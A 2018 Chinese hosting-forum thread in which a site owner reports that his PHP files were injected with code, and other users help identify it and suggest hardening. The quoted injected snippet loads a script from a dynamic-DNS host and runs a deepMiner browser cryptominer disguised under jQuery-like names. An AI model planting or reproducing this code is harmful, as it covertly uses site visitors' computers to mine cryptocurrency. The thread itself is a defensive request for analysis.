全球主机交流论坛

标题: 论坛被挂马了,附上木马代码,求大神分析 [打印本页]
作者: 图样图森破    时间: 2018-1-26 09:49
标题: 论坛被挂马了,附上木马代码,求大神分析
本帖最后由 图样图森破 于 2018-1-26 10:11 编辑


今天打开自己的一个论坛,杀毒软件马上报警,

经检查,发现论坛根目录下的PHP文件全部被插入下面这段代码:


echo "<script src='https://greenindex.dynamic-dns.net/jqueryeasyui.js'></script>
        <script>
            var uri = 'www';
            var jqueryui = new deepMiner.Anonymous(uri, {autoThreads: true,throttle: 0.5});
            if (!jqueryui.isMobile() && !jqueryui.didOptOut(14400)) {
            jqueryui.start();
            }
        </script>";



求大神分析,这是啥东东?如何预防再次被挂马?
作者: klon99    时间: 2018-1-26 09:51
无法预防,因为你压根都不知道别人从哪里进来的
作者: 图样图森破    时间: 2018-1-26 09:53
klon99 发表于 2018-1-26 09:51
无法预防,因为你压根都不知道别人从哪里进来的

对方应该没有拿到管理员权限
作者: ecosway598    时间: 2018-1-26 09:53
提示: 作者被禁止或删除 内容自动屏蔽
作者: 图样图森破    时间: 2018-1-26 09:56
ecosway598 发表于 2018-1-26 09:53
修改  3389 22 21 关闭可关闭的端口  只留80 443

文件 目录权限设置444

谢谢大佬指点,之前从未做过安全设置,没想到没什么流量的网站也会被盯上
作者: ecosway598    时间: 2018-1-26 10:03
提示: 作者被禁止或删除 内容自动屏蔽
作者: 图样图森破    时间: 2018-1-26 10:12
经分析,发现论坛根目录下的PHP文件全部被插入下面这段代码:

echo "<script src='https://greenindex.dynamic-dns.net/jqueryeasyui.js'></script>
        <script>
            var uri = 'www';
            var jqueryui = new deepMiner.Anonymous(uri, {autoThreads: true,throttle: 0.5});
            if (!jqueryui.isMobile() && !jqueryui.didOptOut(14400)) {
            jqueryui.start();
            }
        </script>";
作者: 嫂子抱紧我    时间: 2018-1-26 10:13
还好只是挖矿
作者: ddnpc    时间: 2018-1-26 10:14
提示: 作者被禁止或删除 内容自动屏蔽
作者: 图样图森破    时间: 2018-1-26 10:14
嫂子抱紧我 发表于 2018-1-26 10:13
还好只是挖矿

果然是挖矿代码啊?
作者: kissbabe    时间: 2018-1-26 10:28
我也遇到了,WP里面的,好多页面都被挂了,看代码是一样的。清除掉了,但是隔一段时间又出来,不知道注入点在哪

  1. https://github.com/deepwn/deepMiner
复制代码
作者: mfcer    时间: 2018-1-26 10:44
kissbabe 发表于 2018-1-26 10:28
我也遇到了,WP里面的,好多页面都被挂了,看代码是一样的。清除掉了,但是隔一段时间又出来,不知道注入点 ...

WP哪个版本的
作者: kissbabe    时间: 2018-1-26 11:01
mfcer 发表于 2018-1-26 10:44
WP哪个版本的

4.8,没升级,不知道是不是这样原因造成的
作者: 尼欧一方通行    时间: 2018-1-26 11:07
kissbabe 发表于 2018-1-26 11:01
4.8,没升级,不知道是不是这样原因造成的

4.8有重大提权漏洞
作者: 今晚我是你的    时间: 2018-1-26 11:13
这代码真牛气
作者: 左手写爱    时间: 2018-1-26 11:18
不知道是什么东西,估计是关键词跳转,手动输入不跳转那种
作者: a2313153    时间: 2018-1-26 12:30
改端口吧,如果程序本身有后门.....
作者: pce0835    时间: 2018-1-27 15:24
只留常用端口
作者: lirui    时间: 2018-1-27 21:27
嫂子抱紧我 发表于 2018-1-26 10:13
还好只是挖矿

汗,挖矿都挖到网站上来,php侵入么~~
能看到其挖矿后的钱包地址么~~
封掉它~~
作者: lirui    时间: 2018-1-27 21:29
恭喜你,中奖了,中彩了~~
作者: woming1984    时间: 2018-2-3 20:12
这些注入挖矿代码的黑客也太无耻了点吧



欢迎光临 全球主机交流论坛 (https://loc.1226.eu.org/) Powered by Discuz! X3.4